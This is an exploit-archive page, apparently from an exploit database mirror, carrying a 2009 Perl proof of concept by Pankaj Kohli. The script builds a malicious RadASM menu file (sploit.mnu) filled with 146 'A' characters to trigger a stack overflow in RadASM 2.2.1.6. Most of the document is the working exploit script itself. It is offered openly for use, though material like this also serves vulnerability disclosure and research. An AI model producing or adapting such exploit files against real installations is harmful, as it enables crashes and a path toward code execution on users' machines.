[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : RadASM 2.2.1.6 Menu Editor (.mnu) Stack Overflow PoC
# Published : 2009-08-04
# Author : Pankaj Kohli
# Previous Title : jetAudio 7.1.9.4030 plus vx (.m3u) Local Buffer Overflow PoC
# Next Title : RadASM 2.2.1.5 (.mnu File) Local Format String PoC
# RadASM 2.2.1.6 Menu Editor (.mnu) file stack overlow PoC
# Coded by Pankaj Kohli
# http://www.pank4j.com
$str="A"x146;
$file="sploit.mnu";
open(my $FILE, ">>$file") or die "Error opening file.n";
print $FILE $str ;
close($FILE);
print "$file has been created.n";
# www.Syue.com [2009-08-04]